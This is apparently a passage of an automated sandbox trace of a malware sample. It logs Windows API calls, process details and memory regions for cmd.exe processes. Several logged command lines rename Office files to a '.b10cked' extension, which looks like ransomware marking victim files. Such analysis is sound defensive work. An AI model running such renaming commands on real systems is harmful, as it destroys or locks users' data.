(in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cebb8 | out: lpConsoleScreenBufferInfo=0x2cebb8) returned 1 [0167.295] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0167.295] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2cebf8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0167.295] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2cebdc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2cebdc*=0x1a) returned 1 [0167.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.295] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0167.296] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.296] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0167.296] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.296] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0167.296] SetConsoleInputExeNameW () returned 0x1 [0167.296] GetConsoleOutputCP () returned 0x1b5 [0167.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0167.296] SetThreadUILanguage (LangId=0x0) returned 0x409 [0167.296] exit (_Code=0) Process: id = "285" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0xdf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22687 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22688 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22689 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22690 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 22691 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22692 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22693 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22694 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22695 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22696 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22838 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22839 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22840 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22841 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 22842 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 22843 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22844 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22845 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22846 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22847 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22848 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22849 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22850 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22851 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22866 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 22867 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22868 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22869 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22870 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 22871 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 22872 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 22873 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 22874 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 22875 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 349 os_tid = 0x910 [0168.455] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb1c | out: lpSystemTimeAsFileTime=0x22fb1c*(dwLowDateTime=0x9b8eba60, dwHighDateTime=0x1d440a9)) [0168.455] GetCurrentProcessId () returned 0xdf8 [0168.455] GetCurrentThreadId () returned 0x910 [0168.455] GetTickCount () returned 0x31cb3 [0168.455] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb14 | out: lpPerformanceCount=0x22fb14*=22524450268) returned 1 [0168.456] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.456] __set_app_type (_Type=0x1) [0168.456] __p__fmode () returned 0x76b331f4 [0168.456] __p__commode () returned 0x76b331fc [0168.457] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.457] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.457] GetCurrentThreadId () returned 0x910 [0168.458] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x910) returned 0x38 [0168.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.458] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22faac | out: phkResult=0x22faac*=0x0) returned 0x2 [0168.489] VirtualQuery (in: lpAddress=0x22fae3, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.490] GetConsoleOutputCP () returned 0x1b5 [0168.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.490] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.491] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.491] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.492] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.492] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.492] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.492] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.492] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.493] GetEnvironmentStringsW () returned 0x310218* [0168.493] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0168.493] GetEnvironmentStringsW () returned 0x310218* [0168.493] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0168.493] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea1c | out: phkResult=0x22ea1c*=0x40) returned 0x0 [0168.493] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0xa8, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.493] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x1, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x1, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x0, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x40, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x40, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x40, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegCloseKey (hKey=0x40) returned 0x0 [0168.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea1c | out: phkResult=0x22ea1c*=0x40) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x40, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x1, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x1, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x0, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x9, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x9, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x9, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegCloseKey (hKey=0x40) returned 0x0 [0168.494] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.494] srand (_Seed=0x5b886386) [0168.494] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"" [0168.495] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"" [0168.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.495] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.496] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.496] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.496] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.496] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.496] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.496] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.496] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0168.496] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.496] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.496] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.496] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.496] GetEnvironmentStringsW () returned 0x312368* [0168.496] FreeEnvironmentStringsW (penv=0x312368) returned 1 [0168.496] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.496] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.496] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.496] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.496] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.496] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.496] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.496] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.496] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.496] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.496] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f7e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.497] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f7e8, lpFilePart=0x22f7e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f7e4*="Desktop") returned 0x18 [0168.497] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.497] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f564 | out: lpFindFileData=0x22f564) returned 0x3109f8 [0168.497] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0168.497] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f564 | out: lpFindFileData=0x22f564) returned 0x3109f8 [0168.497] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0168.497] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f564 | out: lpFindFileData=0x22f564) returned 0x3109f8 [0168.497] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0168.497] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.497] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.497] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.497] GetEnvironmentStringsW () returned 0x310218* [0168.498] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0168.498] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.498] GetConsoleOutputCP () returned 0x1b5 [0168.504] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.504] GetUserDefaultLCID () returned 0x409 [0168.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f928, cchData=128 | out: lpLCData="0") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f928, cchData=128 | out: lpLCData="0") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f928, cchData=128 | out: lpLCData="1") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.505] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.506] GetConsoleTitleW (in: lpConsoleTitle=0x300938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.507] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.507] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.507] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.508] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.508] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.508] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.508] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.508] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.508] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.508] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.508] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0168.513] GetConsoleTitleW (in: lpConsoleTitle=0x22f620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.759] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.759] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.759] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.759] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.759] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.759] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.759] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.759] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.759] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.759] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.759] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.759] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.760] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.760] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.760] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.760] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.760] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.760] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.760] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.760] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.760] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.760] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.760] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.760] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.760] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.760] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.760] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.760] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.761] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.761] _wcsicmp (_String1="move", 